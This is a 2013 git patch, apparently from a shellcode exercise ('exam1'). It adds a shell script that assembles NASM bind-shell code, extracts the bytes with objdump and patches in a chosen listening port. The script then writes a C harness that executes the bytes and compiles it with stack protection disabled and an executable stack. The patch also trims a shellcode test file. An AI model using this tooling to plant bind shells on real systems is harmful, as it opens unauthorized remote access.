From fbac420d11d60f13ee5122fb454c83d7486134cf Mon Sep 17 00:00:00 2001 From: arno01 Date: Mon, 11 Mar 2013 23:04:47 +0100 Subject: [PATCH] Significantly improved compile.sh and renamed it to compile_all.sh. Now it is much more easy to configure the port\! --- exam1/compile_all.sh | 74 ++++++++++++++++++++++++++++++++++++++++++++ exam1/shellcode.c | 2 -- 2 files changed, 74 insertions(+), 2 deletions(-) create mode 100755 exam1/compile_all.sh diff --git a/exam1/compile_all.sh b/exam1/compile_all.sh new file mode 100755 index 0000000..6e9d2ea --- /dev/null +++ b/exam1/compile_all.sh @@ -0,0 +1,74 @@ +#!/usr/bin/env sh +# +# Create shellcode with specific port +# +# Example +# ./compile_all.sh shell_bind_tcp 50123 +# +# If no port specified, the default one will be used 43775 +# +# Port is stored in last two bytes in HEX +# + +ARG1=$1 # Specify program +ARG2=$2 # Specify port + + +if [ -z "$ARG1" ]; then + echo " [I] Please specify program you would like to assemble!" + echo " [I] Example: ./compile_all.sh shell_bin_tcp 50123" + exit 1; +elif ! [ -e "$ARG1".nasm ]; then + ARG1_GUESS=$(echo $ARG1 |sed 's/.nasm//g') + if [ -e "$ARG1_GUESS" ]; then + ARG1=$ARG1_GUESS + else + echo " [E] File "$ARG1".nasm does not exist!" + exit 1; + fi +fi + +if ! $(grep -qi ^global $ARG1.nasm 2>/dev/null); then + echo " [E] The file "$ARG1.nasm" does not appear to be a correct NASM source!" + exit 1; +fi + + +echo " [+] Assembling "$1".nasm with NASM ..." +nasm -f elf32 -o $ARG1.o $ARG1.nasm && \ +echo " [+] Linking "$1".o ..." && \ +ld -m elf_i386 -o $ARG1 $ARG1.o && \ +echo -e " [+] Generating shellcode with objdump ..." && \ +SHELLCODE=$(objdump -d ./$ARG1 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/' |sed 's/$/"/g') + +if [ -z "$ARG2" ]; then + FULL_SHELLCODE=$(echo $SHELLCODE) +else + PORT_HEX=$(printf '%.4x' $ARG2 | sed 's/../\\x&/g') + FULL_SHELLCODE=$(echo -n $SHELLCODE | sed 's/.........$//' ; echo $PORT_HEX"\"") +fi + +echo -ne " [+] Shellcode size is "$(echo -ne $FULL_SHELLCODE|sed 's/\"//g'|wc -c)" bytes\n" +echo $FULL_SHELLCODE + + +echo " [+] Generating shellcode.c file with the "$ARG1" shellcode ..." +cat > shellcode.c << EOF +#include +#include + +unsigned char code[] = \ +$FULL_SHELLCODE; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} +EOF + +echo " [+] Compiling shellcode.c with GCC ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +echo -e " [+] All done! You can run the shellcode now: \n$ ./shellcode" diff --git a/exam1/shellcode.c b/exam1/shellcode.c index ddcddad..dbc7a19 100644 --- a/exam1/shellcode.c +++ b/exam1/shellcode.c @@ -6,8 +6,6 @@ unsigned char code[] = "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a main() { printf("Shellcode Length: %d\n", strlen(code)); - int (*ret)() = (int(*)())code; - ret(); }